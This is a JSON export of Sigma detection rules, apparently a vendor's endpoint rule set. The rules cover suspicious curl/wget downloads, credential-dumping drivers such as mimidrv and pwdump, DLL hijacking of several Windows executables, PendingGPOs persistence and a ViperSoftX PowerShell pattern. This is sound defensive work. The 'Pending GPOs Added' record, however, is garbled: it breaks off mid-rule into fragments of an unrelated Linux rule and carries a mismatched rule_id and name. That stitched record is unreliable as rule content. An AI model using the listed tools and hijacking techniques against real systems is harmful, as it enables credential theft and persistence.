exclusion_vscode:\n CommandLine|contains:\n - ' https://raw.githubusercontent.com/microsoft/vscode/master/extensions/json-language-features/package.json'\n - ' https://raw.githubusercontent.com/microsoft/pyright/*/packages/vscode-pyright/package.json'\n - ' https://raw.githubusercontent.com/microsoft/vscode/main/extensions/typescript-language-features/package.json'\n - ' https://raw.githubusercontent.com/rust-analyzer/rust-analyzer/*/editors/code/package.json'\n - ' https://raw.githubusercontent.com/luals/vscode-lua/master/package.json'\n\n exclusion_apache:\n CommandLine|contains: ' https://raw.githubusercontent.com/apache/'\n\n exclusion_installomator:\n CommandLine: 'curl -o installomator.sh https://raw.githubusercontent.com/installomator/installomator/main/installomator.sh'\n\n exclusion_minikube:\n CommandLine|contains: 'curl -LO https://storage.googleapis.com/minikube/releases/latest/'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "33f20b55-a6a9-47fa-8058-df707fd25325",
"rule_name": "File Downloaded via cURL or wget from Suspicious URL (macOS)",
"rule_description": "Detects the usage of cURL or wget to download a file from public hosting services that may contain a malicious payload.\nThis technique is used by attackers to download payloads that are hosted on public websites.\nIt is recommended to perform an analysis of the downloaded file to check if the content is malicious.\n",
"rule_creation_date": "2023-02-13",
"rule_modified_date": "2025-09-10",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1071.001",
"attack.t1105"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "340aa5a9-5616-4c66-a76c-91098df5a7b3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086442Z",
"creation_date": "2026-03-23T11:45:34.086444Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086449Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"http://foofus.net/goons/fizzgig/fgdump/",
"https://jpcertcc.github.io/ToolAnalysisResultSheet/details/PWDumpX.htm",
"https://github.com/gentilkiwi/mimikatz",
"https://jpcertcc.github.io/ToolAnalysisResultSheet/details/gsecdump.htm",
"http://foofus.net/goons/fizzgig/pwdump/",
"https://attack.mitre.org/software/S0119/",
"https://attack.mitre.org/techniques/T1068/",
"https://attack.mitre.org/techniques/T1003/"
],
"name": "t1003_malicious_driver_for_credential_dumping.yml",
"content": "title: Malicious Driver Linked to Credential Dumping Loaded\nid: 340aa5a9-5616-4c66-a76c-91098df5a7b3\ndescription: |\n Detects the loading of malicious Windows kernel drivers that have the ability to perform credential dumping.\n Attackers may try to dump secrets or credentials from the system directly from the kernel to use for later lateral movement or persistence.\n These drivers are either signed (usually maliciously) or unsigned, if integrity checks were disabled earlier in the injection chain.\n It is recommended to analyze the context around the loading of the malicious driver to look for other malicious actions on the host.\nreferences:\n - http://foofus.net/goons/fizzgig/fgdump/\n - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/PWDumpX.htm\n - https://github.com/gentilkiwi/mimikatz\n - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/gsecdump.htm\n - http://foofus.net/goons/fizzgig/pwdump/\n - https://attack.mitre.org/software/S0119/\n - https://attack.mitre.org/techniques/T1068/\n - https://attack.mitre.org/techniques/T1003/\ndate: 2022/08/02\nmodified: 2025/01/09\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1068\n - attack.credential_access\n - attack.t1003\n - classification.Windows.Source.DriverLoad\n - classification.Windows.Rootkit.CredentialDumper\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: driver_load\ndetection:\n selection:\n ImageLoaded|contains:\n - 'fgexec'\n - 'dumpsvc'\n - 'cachedump'\n - 'mimidrv'\n - 'gsecdump'\n - 'servpw'\n - 'pwdump'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "340aa5a9-5616-4c66-a76c-91098df5a7b3",
"rule_name": "Malicious Driver Linked to Credential Dumping Loaded",
"rule_description": "Detects the loading of malicious Windows kernel drivers that have the ability to perform credential dumping.\nAttackers may try to dump secrets or credentials from the system directly from the kernel to use for later lateral movement or persistence.\nThese drivers are either signed (usually maliciously) or unsigned, if integrity checks were disabled earlier in the injection chain.\nIt is recommended to analyze the context around the loading of the malicious driver to look for other malicious actions on the host.\n",
"rule_creation_date": "2022-08-02",
"rule_modified_date": "2025-01-09",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1003",
"attack.t1068"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "34295504-9358-4119-aa08-84b4c5880ad5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097205Z",
"creation_date": "2026-03-23T11:45:34.097207Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097211Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html",
"https://securelist.com/apt10-tracking-down-lodeinfo-2022-part-i/107742/",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_k7sysmon.yml",
"content": "title: DLL Hijacking via K7SysMon.exe\nid: 34295504-9358-4119-aa08-84b4c5880ad5\ndescription: |\n Detects potential Windows DLL Hijacking via K7SysMon.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html\n - https://securelist.com/apt10-tracking-down-lodeinfo-2022-part-i/107742/\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2023/09/05\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'K7SysMon.EXE'\n ImageLoaded|endswith: '\\K7SysMn1.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\K7 Computing\\'\n - '?:\\Program Files (x86)\\K7 Computing\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\K7 Computing\\'\n - '?:\\Program Files (x86)\\K7 Computing\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'K7 Computing Pvt Ltd'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "34295504-9358-4119-aa08-84b4c5880ad5",
"rule_name": "DLL Hijacking via K7SysMon.exe",
"rule_description": "Detects potential Windows DLL Hijacking via K7SysMon.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2023-09-05",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3437577c-61e0-46ac-9f02-bbc91228e25f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072669Z",
"creation_date": "2026-03-23T11:45:34.072671Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072675Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1484/001/",
"https://securelist.com/gootkit-the-cautious-trojan/102731/"
],
"name": "t1484_001_persistence_registry_pendinggpos.yml",
"content": "title: Pending GPOs Added\nid: 3437577c-61e0-46ac-9f02-bbc91228e25f\ndescription: |\n Detects when an entry in pending GPOs is added to the registry. This has been used by malwares such as GootKit.\n To achieve persistence, the malware generates an INF file containing a [DefaultInstall] section that references the payload.\n It then modifies the PendingGPOs registry key, inserting the absolute path of the INF file.\n When explorer.exe processes Group Policy Objects (GPOs), it executes the payload specified in the [DefaultInstall] section of the INF file.\n It is recommended to ensure that this modification is legitimate and performed by an authorized administrator. You need to review the [DefaultInstall] section of the INF file to check if it includes an absolute path to malware.\nreferences:\n - https://attack.mitre.org/techniques/T1484/001/\n - https://securelist.com/gootkit-the-cautious-trojan/102731/\ndate: 2020/09/24\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1484.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n # PendingGPOs trick used by gootkit for instance\n # contains X values :\n # Count (set to 1)\n # SectionX (Section1/Section2/...) : DefaultInstall for instance (in .ini file)\n # PathX (Path1/Path2/...) : path to ini file\n\n # only alert on PathX being set (others are meaningless)\n TargetObject|contains: '\\SOFTWARE\\Microsoft\\IEAK\\GroupPolicy\\PendingGPOs\\Path'\n\n filter_empty:\n Details: '(Empty)'\n\n exclusion_ie_custom_settings:\n # commandline : rundll32 iedkcs32.dll,BrandExternal ;*2,3 /proc/end <==?;echo ?##Moba##?; done'\n\n exclusion_nagios:\n ParentCommandLine|startswith: 'bash -c /usr/local/nagios/libexec/check_'\n\n exclusion_fog:\n ParentCommandLine|contains : '/opt/fog-service/FOGUserService.exe'\n\n exclusion_orbit:\n ParentImage: '/opt/orbit/bin/orbit/linux*/orbit'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "361b764f-8b11-4ec2-b6dd-2d8fb7195f6f",
"rule_name": "Users Execution",
"rule_description": "Detects the execution of the 'users' command to print the list of users currently logged into the system.\nAttackers may use this technique during discovery phase to retrieve the list of existing users or to list users that are currently logged in.\nIt is recommended to correlate this alert with any other discovery activity on the host.\nIf this is a recurring false positive, it is highly recommended to create a whitelist for the offending software.\n",
"rule_creation_date": "2022-12-23",
"rule_modified_date": "2026-02-25",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1033",
"attack.t1087.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "36295180-e9b0-4900-8268-36a38e641137",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082341Z",
"creation_date": "2026-03-23T11:45:34.082343Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082347Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_write.yml",
"content": "title: DLL Hijacking via write.exe\nid: 36295180-e9b0-4900-8268-36a38e641137\ndescription: |\n Detects potential Windows DLL Hijacking via write.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'write'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CLDAPI.dll'\n - '\\CRYPTBASE.DLL'\n - '\\davclnt.dll'\n - '\\drprov.dll'\n - '\\edputil.dll'\n - '\\FLTLIB.DLL'\n - '\\ntlanman.dll'\n - '\\p9np.dll'\n - '\\PROPSYS.dll'\n - '\\windows.storage.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "36295180-e9b0-4900-8268-36a38e641137",
"rule_name": "DLL Hijacking via write.exe",
"rule_description": "Detects potential Windows DLL Hijacking via write.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3652ecec-d855-48ad-8fb0-ebcbcd0522e7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.602505Z",
"creation_date": "2026-03-23T11:45:34.602508Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.602515Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wbengine.yml",
"content": "title: DLL Hijacking via wbengine.exe\nid: 3652ecec-d855-48ad-8fb0-ebcbcd0522e7\ndescription: |\n Detects potential Windows DLL Hijacking via wbengine.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wbengine.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcd.dll'\n - '\\CLUSAPI.dll'\n - '\\DNSAPI.dll'\n - '\\FLTLIB.DLL'\n - '\\NETUTILS.DLL'\n - '\\SPP.dll'\n - '\\SRVCLI.DLL'\n - '\\VirtDisk.dll'\n - '\\VSSAPI.DLL'\n - '\\VssTrace.DLL'\n - '\\wer.dll'\n - '\\XmlLite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3652ecec-d855-48ad-8fb0-ebcbcd0522e7",
"rule_name": "DLL Hijacking via wbengine.exe",
"rule_description": "Detects potential Windows DLL Hijacking via wbengine.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3681933f-d809-4ed2-ab94-c97f202a5989",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085512Z",
"creation_date": "2026-03-23T11:45:34.085514Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085518Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://chris.partridge.tech/2022/evolution-of-vipersoftx-dga/",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1059_001_vipersoftx_powershell.yml",
"content": "title: ViperSoftX's PowerShell Commandlet Executed\nid: 3681933f-d809-4ed2-ab94-c97f202a5989\ndescription: |\n Detects a PowerShell command related to ViperSoftX.\n ViperSoftX is an information stealer and remote access trojan known to steal sensitive information such as cryptocurrency wallets and passwords stored in browsers and password managers.\n It is recommended to analyze the process responsible for the execution of this PowerShell command as well as to look for other actions indicative of information theft.\nreferences:\n - https://chris.partridge.tech/2022/evolution-of-vipersoftx-dga/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2025/07/10\nmodified: 2025/08/20\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Stealer.ViperSoftX\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.SensitiveInformation\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains: \"','.','RightToLeft')\"\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3681933f-d809-4ed2-ab94-c97f202a5989",
"rule_name": "ViperSoftX's PowerShell Commandlet Executed",
"rule_description": "Detects a PowerShell command related to ViperSoftX.\nViperSoftX is an information stealer and remote access trojan known to steal sensitive information such as cryptocurrency wallets and passwords stored in browsers and password managers.\nIt is recommended to analyze the process responsible for the execution of this PowerShell command as well as to look for other actions indicative of information theft.\n",
"rule_creation_date": "2025-07-10",
"rule_modified_date": "2025-08-20",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "368595bb-89c5-4ae7-9ff8-08badb53c525",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.090206Z",
"creation_date": "2026-03-23T11:45:34.090208Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.090212Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_msedgewebview2.yml",
"content": "title: DLL Hijacking via msedgewebview2.exe\nid: 368595bb-89c5-4ae7-9ff8-08badb53c525\ndescription: |\n Detects potential Windows DLL Hijacking via msedgewebview2.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'msedgewebview2.exe'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith:\n - '\\dataexchange.dll'\n - '\\msctf.dll'\n - '\\mswsock.dll'\n - '\\ntmarta.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Google\\Chrome\\Application\\'\n - '?:\\Program Files (x86)\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\\\*\\'\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files (x86)\\Mozilla Firefox\\'\n - '?:\\Program Files\\Google\\Chrome\\Application\\'\n - '?:\\Program Files\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files\\Microsoft\\EdgeWebView\\Application\\\\*\\'\n - '?:\\Program Files\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files\\Mozilla Firefox\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "368595bb-89c5-4ae7-9ff8-08badb53c525",
"rule_name": "DLL Hijacking via msedgewebview2.exe",
"rule_description": "Detects potential Windows DLL Hijacking via msedgewebview2.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "368a9015-91da-4e88-9611-4dd3cf5e001c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
